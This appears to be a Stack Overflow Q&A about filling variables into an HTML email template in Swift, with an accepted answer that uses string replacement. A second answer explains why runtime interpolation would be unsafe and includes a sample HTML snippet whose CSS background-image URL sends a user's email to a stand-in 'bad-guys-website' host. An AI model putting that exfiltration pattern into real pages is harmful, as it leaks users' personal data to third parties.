# How to change content of HTML file with variables?

Tags: html, string, swift, mfmailcomposeviewcontroller

I have HTML. HTML file contains few such texts: `\(something)` . This HTML I converted into String. But when I put this into mail as html body (or web view), instead of my data are presented these `\(something)`. Does anybody know how to handle this issue?

I know that html is not swift but when I convert this into string it should behave like swift string, no? Thank you

For better understanding check screenshot.

Piece of code from my html file:

[image]

OSX Mail app:

[image]

Answer (score 4, accepted):

I had the same problem and used the `stringByReplacingOccurrencesOfString`. See below for an example code:

You get the content of your `html` file by calling the `NSBundle`

```
let filePath = NSBundle.mainBundle().pathForResource("emailTemplate", ofType: "html")
let contentData = NSFileManager.defaultManager().contentsAtPath(filePath!)
let emailTemplate = NSString(data: contentData!, encoding: NSUTF8StringEncoding) as? String
```

In your `html file` you replace where you want your variables to be, with a unique target, for example `@%`, doesn't matter what that is as long as it is unique to that variable. Let's assume your `html`  file would look like:

[image: HTML File]

You then replace the string with the target:

```
let replacedHtmlContent = emailTemplate?.stringByReplacingOccurrencesOfString("@%", withString: "Name")
```

Your new `html` content would be:

[image: New HTML Content output]

Hope this helps, good luck!

Answer (score 0):

The compiler handles the groundwork for string interpolation to work; so when you pass it that string at runtime it (thankfully) does not evaluate it looking for variables to populate.

If it did, someone could pass arbitrary code into your program through data files and it would be evaluated because

> “String interpolation is a way to construct a new String value from a mix of constants, **variables**, literals, and **expressions** by including their values inside a string literal.” (emphasis added)

*Excerpt From: Apple Inc. “The Swift Programming Language (Swift 5.0).” Apple Books. https://books.apple.com/us/book/the-swift-programming-language-swift-5-0/id881256329*

So evaluating the string at runtime and filling in variables from the execution scope would allow attackers to leak data with something like

```
<html>
    <body></body>
    <style>body{ background-image: url("http://bad-guys-website/?stolen_email=\(userEmailVariableInSwiftCodeFromApp)");}</style>
</html>
```